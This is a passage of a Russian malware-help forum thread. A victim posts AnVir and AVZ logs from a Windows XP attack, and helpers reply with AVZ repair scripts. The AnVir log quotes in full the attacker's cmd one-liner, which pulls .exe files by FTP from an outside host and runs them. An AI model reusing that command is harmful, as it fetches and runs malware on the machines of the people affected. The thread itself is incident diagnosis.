Помогите найти дыру в системе

[dem-it]

Примерно неделю назад я был заражен вирусом. Он пришел на компьютер сам (я ничего не запускал). Видимо, виной дыра в системе или ПО. После этого систему переустановил. Сегодня снова обнаружил атаку на мой PC но вовремя предотвратил заражение. Помогите найти и залатать дыру в моей системе.

Вот все сведения, которыми я располагаю:
Сегодня 2011.08.28
Время 00 часов 30 минут
Операционка WinXP SP3 (заплатки примерно за Июнь 2011)

Во время обнаружения атаки работали приложения:
Denwer-3 (версия 2008-01-13) <-- (думаю в нем вся проблемма)
Winword (Portable MS Office 2003 SP2 RUS)
HandyCache
Notepad++
AnVir Task Manager
PrivateFierwall
Avast! Free
...Ну и некоторые другие по мелочи, к ним минимум подозрения.

Вырезка из лога AnVir Task Manager:
08/28 00:16:10 wmiprvse.exe 3272 started by svchost.exe C:\WINDOWS\system32\wbem\wmiprvse.exe (предполагаю что запустила служба "Запуск серверных процессов DCOM")
08/28 00:16:38 wmiprvse.exe 1740 started by svchost.exe NT AUTHORITY\SYSTEM C:\WINDOWS\system32\wbem\wmiprvse.exe
08/28 00:16:38 msiexec.exe 1080 started by services.exe NT AUTHORITY\SYSTEM C:\WINDOWS\system32\msiexec.exe /V
08/28 00:17:46 cmd.exe 3432 started by wmiprvse.exe COMP\admin C:\WINDOWS\system32\cmd.exe /d /c md i2393&cd i2393&del *.* /f /s /q&echo open yBBDD.to.jajaca.com >j&echo Wmi >>j&echo 123 >>j&echo mget *.exe >>j&echo bye >>j&FTP.EXE -i -s:j&del j&echo for %%i in (*.exe) do start %%i >D.bat&echo for %%i in (*.exe) do %%i >>D.bat&echo del /f /q %0% >>D.bat&D.bat
08/28 00:17:46 ftp.exe 2844 started by cmd.exe COMP\admin C:\WINDOWS\system32\ftp.exe -i -s:j
(Широко раскрыв рот на жалобы фаерволла о запуск ftp.exe прибиваю его и выдергиваю 3G модем из разьема)
08/28 00:18:16 cmd.exe 3432 terminated, worked 0:29, CPU 0:00 C:\WINDOWS\system32\cmd.exe
08/28 00:18:16 ftp.exe 2844 terminated, worked 0:29, CPU 0:00 C:\WINDOWS\system32\ftp.exe
08/28 00:18:56 wmiprvse.exe 3272 terminated, worked 2:45, CPU 0:00 C:\WINDOWS\system32\wbem\wmiprvse.exe


Лог (строки, которые могут представить интерес) Ревизора AVZ
c:\windows\Installer\$PatchCache$\Managed\4c7bb632 9144df244090e152a7523ed4 = Каталог создан (там файлы 2 дневной давности, видимо не связаны с вирусом и остались от установки vcredist)
c:\windows\system32\appmgmt = Каталог создан (создан за четыре дня до сегоня)
c:\windows\system32\aswboot.exe = Файл создан (дата создания - больше месяца назад! у меня операционка неделю назад только поставлена была)
c:\windows\system32\config\systemprofile\Applicati on Data\Microsoft\cryptneturlcache = Каталог создан
c:\windows\system32\drivers\aswmon.sys = Файл создан
c:\windows\system32\drivers\inspect.sys = Файл удален
c:\windows\system32\i2393 = Каталог создан (эту папку создал командный файл при атаке)
c:\windows\system32\Macromed\Flash\flashutil10t_pl ugin.exe = Файл создан
c:\windows\system32\sscprot.dll = Файл создан (дата создания - 2008 год )
c:\windows\LastGood = Каталог удален



Лог проверки AVZ:

Код:

Протокол антивирусной утилиты AVZ версии 4.35
Сканирование запущено в 28.08.2011 02:01:24
Загружена база: сигнатуры - 293482, нейропрофили - 2, микропрограммы лечения - 56, база от 20.08.2011 04:00
Загружены микропрограммы эвристики: 388
Загружены микропрограммы ИПУ: 9
Загружены цифровые подписи системных файлов: 290795
Режим эвристического анализатора: Средний уровень эвристики
Режим лечения: выключено
Версия Windows: 5.1.2600, Service Pack 3 ; AVZ работает с правами администратора
Восстановление системы: Отключено
1. Поиск RootKit и программ, перехватывающих функции API
1.1 Поиск перехватчиков API, работающих в UserMode
 Анализ kernel32.dll, таблица экспорта найдена в секции .text
 Анализ ntdll.dll, таблица экспорта найдена в секции .text
 Анализ user32.dll, таблица экспорта найдена в секции .text
 Анализ advapi32.dll, таблица экспорта найдена в секции .text
 Анализ ws2_32.dll, таблица экспорта найдена в секции .text
 Анализ wininet.dll, таблица экспорта найдена в секции .text
 Анализ rasapi32.dll, таблица экспорта найдена в секции .text
 Анализ urlmon.dll, таблица экспорта найдена в секции .text
 Анализ netapi32.dll, таблица экспорта найдена в секции .text
1.2 Поиск перехватчиков API, работающих в KernelMode
 Драйвер успешно загружен
 SDT найдена (RVA=085700)
 Ядро ntkrnlpa.exe обнаружено в памяти по адресу 804D7000
   SDT = 8055C700
   KiST = 80504480 (284)
Функция NtAddBootEntry (09) перехвачена (80616A60->F38EA202), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtAdjustPrivilegesToken (0B) перехвачена (805EC494->F6607D30), перехватчик C:\WINDOWS\system32\DRIVERS\pwipf6.sys, драйвер опознан как безопасный
Функция NtAllocateVirtualMemory (11) перехвачена (805A8AE6->F3978D8C), перехватчик C:\WINDOWS\System32\Drivers\aswSP.SYS, драйвер опознан как безопасный
Функция NtClose (19) перехвачена (805BC55C->F390E6C1), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtConnectPort (1F) перехвачена (805A45FC->F6609AA0), перехватчик C:\WINDOWS\system32\DRIVERS\pwipf6.sys, драйвер опознан как безопасный
Функция NtCreateEvent (23) перехвачена (8060EF7E->F38EC7F0), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtCreateEventPair (24) перехвачена (806172D6->F38EC848), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtCreateFile (25) перехвачена (805790A8->F6608D70), перехватчик C:\WINDOWS\system32\DRIVERS\pwipf6.sys, драйвер опознан как безопасный
Функция NtCreateIoCompletion (26) перехвачена (80578A86->F38EC95E), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtCreateKey (29) перехвачена (80624120->F390E075), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtCreateMutant (2B) перехвачена (806176CE->F38EC746), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtCreatePort (2E) перехвачена (805A5118->F6609DE0), перехватчик C:\WINDOWS\system32\DRIVERS\pwipf6.sys, драйвер опознан как безопасный
Функция NtCreateProcessEx (30) перехвачена (805D11AA->F660A8D0), перехватчик C:\WINDOWS\system32\DRIVERS\pwipf6.sys, драйвер опознан как безопасный
Функция NtCreateSection (32) перехвачена (805AB3F4->F38EC898), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtCreateSemaphore (33) перехвачена (8061507E->F38EC79A), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtCreateSymbolicLinkObject (34) перехвачена (805C3A26->F6609290), перехватчик C:\WINDOWS\system32\DRIVERS\pwipf6.sys, драйвер опознан как безопасный
Функция NtCreateThread (35) перехвачена (805D1048->F660A4D0), перехватчик C:\WINDOWS\system32\DRIVERS\pwipf6.sys, драйвер опознан как безопасный
Функция NtCreateTimer (36) перехвачена (80616F9E->F38EC90C), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtDebugActiveProcess (39) перехвачена (80643B60->F6607490), перехватчик C:\WINDOWS\system32\DRIVERS\pwipf6.sys, драйвер опознан как безопасный
Функция NtDeleteBootEntry (3D) перехвачена (80616A52->F38EA226), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtDeleteKey (3F) перехвачена (806245BC->F390ED87), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtDeleteValueKey (41) перехвачена (8062478C->F390F03D), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtDuplicateObject (44) перехвачена (805BE034->F38ECBE2), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtEnumerateKey (47) перехвачена (8062496C->F390EBF2), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtEnumerateValueKey (49) перехвачена (80624BD6->F390EA5D), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtFreeVirtualMemory (53) перехвачена (805B2FDE->F3978E3C), перехватчик C:\WINDOWS\System32\Drivers\aswSP.SYS, драйвер опознан как безопасный
Функция NtLoadDriver (61) перехвачена (80584160->F38E9FF0), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtModifyBootEntry (6D) перехвачена (80616A52->F38EA24A), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtNotifyChangeKey (6F) перехвачена (8062630E->F38ECD56), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtNotifyChangeMultipleKeys (70) перехвачена (80624F42->F38EACDA), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtOpenEvent (72) перехвачена (8060F07E->F38EC820), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtOpenEventPair (73) перехвачена (806173AE->F38EC870), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtOpenFile (74) перехвачена (8057A1A6->F6609040), перехватчик C:\WINDOWS\system32\DRIVERS\pwipf6.sys, драйвер опознан как безопасный
Функция NtOpenIoCompletion (75) перехвачена (80578B5E->F38EC988), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtOpenKey (77) перехвачена (806254FE->F390E3D1), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtOpenMutant (78) перехвачена (806177A6->F38EC772), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtOpenProcess (7A) перехвачена (805CB470->F38ECA1A), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtOpenSection (7D) перехвачена (805AA418->F38EC8D8), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtOpenSemaphore (7E) перехвачена (80615178->F38EC7C8), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtOpenThread (80) перехвачена (805CB6FC->F38ECAFE), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtOpenTimer (83) перехвачена (806170C0->F38EC936), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtProtectVirtualMemory (89) перехвачена (805B844A->F3978ED4), перехватчик C:\WINDOWS\System32\Drivers\aswSP.SYS, драйвер опознан как безопасный
Функция NtQueryKey (A0) перехвачена (80625840->F390E8D8), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtQueryObject (A3) перехвачена (805C52F8->F38EABA0), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtQueryValueKey (B1) перехвачена (80622344->F390E72A), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtRenameKey (C0) перехвачена (80623B42->F398110E), перехватчик C:\WINDOWS\System32\Drivers\aswSP.SYS, драйвер опознан как безопасный
Функция NtRequestPort (C7) - модификация машинного кода. Метод JmpTo. jmp F7ABDCA0
Функция NtRequestWaitReplyPort (C8) - модификация машинного кода. Метод JmpTo. jmp F7ABDD40
Функция NtRestoreKey (CC) перехвачена (80625B00->F390D6E8), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtResumeThread (CE) перехвачена (805D49EA->F6609540), перехватчик C:\WINDOWS\system32\DRIVERS\pwipf6.sys, драйвер опознан как безопасный
Функция NtSecureConnectPort (D2) перехвачена (805A3D90->F6609C40), перехватчик C:\WINDOWS\system32\DRIVERS\pwipf6.sys, драйвер опознан как безопасный
Функция NtSetBootEntryOrder (D3) перехвачена (80616A60->F38EA26E), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtSetBootOptions (D4) перехвачена (80616A60->F38EA292), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtSetInformationFile (E0) перехвачена (8057B034->F66093B0), перехватчик C:\WINDOWS\system32\DRIVERS\pwipf6.sys, драйвер опознан как безопасный
Функция NtSetSystemInformation (F0) перехвачена (8060FD36->F38EA04A), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtSetSystemPowerState (F1) перехвачена (80653E18->F38EA186), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtSetValueKey (F7) перехвачена (80622692->F390EE8E), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtShutdownSystem (F9) перехвачена (80612FC0->F38EA162), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtSystemDebugControl (FF) перехвачена (806180EA->F38EA1AA), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtTerminateProcess (101) перехвачена (805D2A12->F66084F0), перехватчик C:\WINDOWS\system32\DRIVERS\pwipf6.sys, драйвер опознан как безопасный
Функция NtTerminateThread (102) перехвачена (805D2C0C->F6608C50), перехватчик C:\WINDOWS\system32\DRIVERS\pwipf6.sys, драйвер опознан как безопасный
Функция NtTraceEvent (104) - модификация машинного кода. Метод JmpTo. jmp F7ABDC00
Функция NtVdmControl (10C) перехвачена (805FBB9C->F38EA2B6), перехватчик C:\WINDOWS\System32\Drivers\aswSnx.SYS, драйвер опознан как безопасный
Функция NtRequestPort (805A2A76) - модификация машинного кода. Метод JmpTo. jmp F7ABDCA0 
Функция NtRequestWaitReplyPort (805A2DA2) - модификация машинного кода. Метод JmpTo. jmp F7ABDD40 
Функция NtTraceEvent (8053515A) - модификация машинного кода. Метод JmpTo. jmp F7ABDC00 
Функция ObInsertObject (805C3006) - модификация машинного кода. Метод JmpTo. jmp F398B7F2 \SystemRoot\System32\Drivers\aswSP.SYS, драйвер опознан как безопасный
Функция ObMakeTemporaryObject (805BC582) - модификация машинного кода. Метод JmpTo. jmp F3989D4C \SystemRoot\System32\Drivers\aswSP.SYS, драйвер опознан как безопасный
Проверено функций: 284, перехвачено: 60, восстановлено: 0
1.3 Проверка IDT и SYSENTER
 Анализ для процессора 1
 Анализ для процессора 2
 Проверка IDT и SYSENTER завершена
1.4 Поиск маскировки процессов и драйверов
 Проверка не производится, так как не установлен драйвер мониторинга AVZPM
1.5 Проверка обработчиков IRP
 Драйвер успешно загружен
\FileSystem\ntfs[IRP_MJ_CREATE] = F398DE88 -> C:\WINDOWS\System32\Drivers\aswSP.SYS, драйвер опознан как безопасный
\FileSystem\ntfs[IRP_MJ_CLOSE] = F398DEC8 -> C:\WINDOWS\System32\Drivers\aswSP.SYS, драйвер опознан как безопасный
\FileSystem\ntfs[IRP_MJ_WRITE] = F398DFA4 -> C:\WINDOWS\System32\Drivers\aswSP.SYS, драйвер опознан как безопасный
\FileSystem\ntfs[IRP_MJ_SET_INFORMATION] = F398DFE4 -> C:\WINDOWS\System32\Drivers\aswSP.SYS, драйвер опознан как безопасный
\FileSystem\FastFat[IRP_MJ_CREATE] = F398E024 -> C:\WINDOWS\System32\Drivers\aswSP.SYS, драйвер опознан как безопасный
\FileSystem\FastFat[IRP_MJ_CLOSE] = F398E064 -> C:\WINDOWS\System32\Drivers\aswSP.SYS, драйвер опознан как безопасный
\FileSystem\FastFat[IRP_MJ_WRITE] = F398E140 -> C:\WINDOWS\System32\Drivers\aswSP.SYS, драйвер опознан как безопасный
\FileSystem\FastFat[IRP_MJ_SET_INFORMATION] = F398E180 -> C:\WINDOWS\System32\Drivers\aswSP.SYS, драйвер опознан как безопасный
 Проверка завершена
2. Проверка памяти
 Количество найденных процессов: 23
 Количество загруженных модулей: 233
Проверка памяти завершена
3. Сканирование дисков
4. Проверка Winsock Layered Service Provider (SPI/LSP)
 Настройки LSP проверены. Ошибок не обнаружено
5. Поиск перехватчиков событий клавиатуры/мыши/окон (Keylogger, троянские DLL)
6. Поиск открытых портов TCP/UDP, используемых вредоносными программами
 Проверка отключена пользователем
7. Эвристичеcкая проверка системы
Нестандартный ключ Winlogon\Shell: "c:\progra~1\blackbox\blackbox.exe"
Нестандартный ключ реестра для системной службы: BITS ImagePath=""
Нестандартный ключ реестра для системной службы: wuauserv ImagePath=""
Проверка завершена
8. Поиск потенциальных уязвимостей
>> Службы: разрешена потенциально опасная служба Schedule (Планировщик заданий)
>> Службы: разрешена потенциально опасная служба RDSessMgr (Диспетчер сеанса справки для удаленного рабочего стола)
> Службы: обратите внимание - набор применяемых на ПК служб зависит от области применения ПК (домашний, ПК в ЛВС компании ...)!
>> Безопасность: к ПК разрешен доступ анонимного пользователя
>> Безопасность: разрешен автоматический вход в систему
Проверка завершена
9. Мастер поиска и устранения проблем
 >>  Модифицирован ключ запуска проводника
 >>  Заблокирована настройка автоматического обновления
 >>  Меню Пуск - заблокированы элементы
 >>  Таймаут завершения служб находится за пределами допустимых значений
 >>  Заблокирован пункт меню Справка и техподдержка
Проверка завершена
Просканировано файлов: 256, извлечено из архивов: 0, найдено вредоносных программ 0, подозрений - 0
Сканирование завершено в 28.08.2011 02:01:59
Сканирование длилось 00:00:37
Если у Вас есть подозрение на наличие вирусов или вопросы по заподозренным объектам,
то Вы можете обратиться в систему http://kaspersky-911.ru

[Info_bot]

Уважаемый(ая) dem-it, спасибо за обращение на наш форум!

Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

[Шапельский Александр]

Выполните скрипт в AVZ (AVZ, Меню Файл\Выполнить скрипт. Подробнее...):

Код:

var
i : integer;
KeyList : TStringList;
begin
KeyList := TStringList.Create;
RegKeyEnumKey('HKLM','SYSTEM', KeyList);
for i := 0 to KeyList.Count-1 do
if pos('controlset', LowerCase(KeyList[i])) > 0 then
 begin
 if RegKeyExistsEx('HKLM', 'SYSTEM\'+KeyList[i]+'\Services\BITS') then
  begin
  RegKeyResetSecurity('HKLM', 'SYSTEM\'+KeyList[i]+'\Services\BITS');
  RegKeyStrParamWrite('HKLM', 'SYSTEM\'+KeyList[i]+'\Services\BITS', 'ImagePath', '%SystemRoot%\System32\svchost.exe -k netsvcs');
  AddToLog('Значение параметра ImagePath в разделе реестра HKLM\SYSTEM\'+KeyList[i]+'\Services\BITS исправлено на оригинальное.');
  end;
 if RegKeyExistsEx('HKLM', 'SYSTEM\'+KeyList[i]+'\Services\wuauserv') then
  begin
  RegKeyResetSecurity('HKLM', 'SYSTEM\'+KeyList[i]+'\Services\wuauserv');
  RegKeyStrParamWrite('HKLM', 'SYSTEM\'+KeyList[i]+'\Services\wuauserv', 'ImagePath', '%SystemRoot%\System32\svchost.exe -k netsvcs');
  AddToLog('Значение параметра ImagePath в разделе реестра HKLM\SYSTEM\'+KeyList[i]+'\Services\wuauserv исправлено на оригинальное.');
  end;
 end;
KeyList.Free;
SaveLog(GetAVZDirectory + 'fystemRoot.log');
end.

Затем следующий

Код:

begin
SearchRootkit(true, true);
SetAVZGuardStatus(true);
QuarantineFile('c:\progra~1\blackbox\blackbox.exe','');               
BC_ImportALL;
Executerepair(6);
Executerepair(16);
RegKeyIntParamWrite('HKLM', 'SYSTEM\CurrentControlSet\Control', 'WaitToKillServiceTimeout', 20000);',' ');  
RegKeyIntParamWrite('HKLM', 'SOFTWARE\Microsoft\Windows\CurrentVersion\policies\NonEnum', '{BDEADF00-C265-11D0-BCED-00A0C90AB50F}', 1);  
 ExecuteWizard('TSW', 2, 2, true);  
BC_Activate;
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.
закачайте карантин по ссылке Прислать запрошенный карантин в шапке Вашей темы (Приложение 3 правил).
Обновите базу АВЗ!
Выполните действия, описанные в п. 1 - 3 Диагностики и логи прикрепите к новому сообщению.

[dem-it]

Во втором скрипте была ошибка, пофиксил, скрипт выполнился.
BlackBox - это нормальная open sources прога заменяющая explorer (оболочка рабочего стола). Размер файла совпадает с оригинальным в дистрибутиве. Программой пользуюсь не один год, работает с минимумом плагинов, к сети доступа не требует, к ней никаких подозрений. Поэтому после перезагрузки компьютера я снова поставил её в качестве Winlogon\Shell.
Службу "Запуск серверных процессов DCOM" отключил сразу после подозрений на "соучастие".

[CyberHelper]

Статистика проведенного лечения:

• Получено карантинов: 1
• Обработано файлов: 3
• В ходе лечения вредоносные программы в карантинах не обнаружены